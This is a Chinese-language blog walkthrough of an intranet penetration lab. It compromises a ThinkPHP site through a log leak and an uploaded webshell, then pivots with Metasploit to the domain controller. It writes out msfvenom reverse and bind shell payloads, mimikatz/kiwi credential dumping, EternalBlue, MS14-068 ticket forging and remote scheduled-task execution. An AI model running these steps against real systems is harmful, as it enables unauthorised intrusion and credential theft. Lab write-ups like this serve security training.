【内网渗透】一次简单内网靶场渗透

业界资讯 2022-10-25 00:38:32 阅读次数: 0

image.png
本次内网网络拓扑图如下所示,首先将WEB的IP 192.168.0.150改为192.168.0.3
image.png

(一)测试过程

信息收集:

1. 对目标IP进行端口扫描。

sudo nmap -sS --open -Pn -p- -v 192.168.0.3

image.png

2.绑定hosts 192.168.0.3 www.webhack123.com,访问网站首页出现一个thinkphp框架。
image.png

3.对网站进行目录扫描。
image.png

4.存在wc.db将其下载下来,使用工具打开,里面存在网站目录文件信息,查看网站目录信息后,可以了解网站的基本架构。
image.png

【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

(二)检测过程

  1. 通过前面的信息搜集,已经知道当前网站是thinkphp框架了,使用工具扫描一下常见的漏洞,发现存在日志泄漏。
    image.png

2.在日志中泄漏了账号和密码的密文。

账号:admin
密文:74c774ef39b5b977c1fd59dbfc73c3e380a65aa3

image.png

3.通过解密获取密码明文web123。
image.png

4.前面对网站进行目录扫描,未发现网站管理后台,因此使用脚本来绑定 hosts 碰撞管理后台的子域名。
image.png

5. admin.webhack123.com就是网站的管理后台。
image.png

6.使用前面获取的管理员账号密码进行登录,可以测试发现验证码是存在缺陷,也可以使用大字典来爆破出管理员的密码。

image.png

7.进入网站后台,修改允许上传的类型,上传一句话木马。
image.png

8.使用蚁剑连接获取webshell。
image.png

  1. 在当前主机先进行简单的信息搜集,当前用户为administrator且主机未安装杀软,存在双网卡192.168.0.0/24 10.10.10.0/24,存在域环境。

生成攻击载荷先上线msf:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999 -f exe>haha.exe
image.png

10.迁移进程获取明文密码。

migrate 600

load kiwi

creds_all

image.png

11.获取登录过当前主机的用户信息。

run post/windows/gather/enum_logged_on_users
image.png

  1. 可以看到存在hackbox域的域用户web,本地管理员Administrator的密码为:!@#Qwe456

前面我们已经知道存在域环境,现在定位到域控为:dc.hackbox.com 10.10.10.149。
image.png

(三)域渗透过程

  1. 前面知道该主机存在两个网卡,现在来对这两个网段的存活主机进行扫描,首先添加:
run autoroute -s 10.10.10.0/24
run autoroute -p

image.png

  1. 对内网存活主机进行扫描,只存在10.10.10.149,也就是域控,且开放了445端口。
    image.png

3.使用永恒之蓝试打,检测出存在永恒之蓝漏洞。
image.png

4. 反向shell失败原因未明,正向的shell是可以成功返回一个meterpreter,成功获取域控dc权限。
image.png
5. 测试使用MS14-068漏洞:使用这个 exp 需要一个普通域控用户, web 是域用户,但不知道密码。前面获取到用户Administrator的密码为!@#Qwe456,现尝试使用用户web和这个密码进行登录。
image.png

6.登录失败,但是密码应该是正确的,只是不是远程组。
image.png
7. #创建票据

ms14-068.exe -u [email protected] -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

Load kiwi

#清理票据

kerberos_ticket_purge

image.png

8.上传 mimikatz 注入票据 mimikatz # kerberos::ptc

[email protected]

image.png

9.查看票据 klist。
image.png

10.成功访问dc域控。
image.png

11.现在来获取域控权限,生成一个正向的载荷:

msfvenom -p windows/meterpreter/bind_tcp  LPORT=9998  -f exe>bind.exe

copy命令复制到域控copy bind.exe \dc\c$。
image.png

12. at命令执行计划任务运行bind.exe

net time [\\dc](https://www.freebuf.com/articles/network/%5C%5Cdc)

at \\dc 1:29:00 c:/bind.ex

image.png

13.成功获取域控权限。
image.png
14.迁移进程抓取明文密码。
image.png
15.至此已经拿下了域控的权限。
image.png
16.迁移到域管理员进程查看三个flag。
image.png

(四)总结

通过此次内网靶场测试,能加深对内网系统的认识,熟练掌握如何使用MSF完成整个打靶过程。

猜你喜欢

转载自blog.csdn.net/Android_wxf/article/details/127417263
今日推荐
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
最强开源大模型 Llama 3 上架 Gitee AI
周排行
自媒体文章如何提高原创度以及如何检测原创度
开启qq邮箱的smtp服务
Qt程序单次启动(QSingleApplication类)
国外的外包网站
更新IDEA主题——放飞代码风格
cocos2dx 实现搓牌效果(翻牌效果),包括铺平动画
dict和json之间的互相转换
angular的一些思考
. Fibonacci数列是这样定义的: F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此,Fibonacci数列就形如:0, 1
洛谷P1064 金明的预算方案
每日归档
更多
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022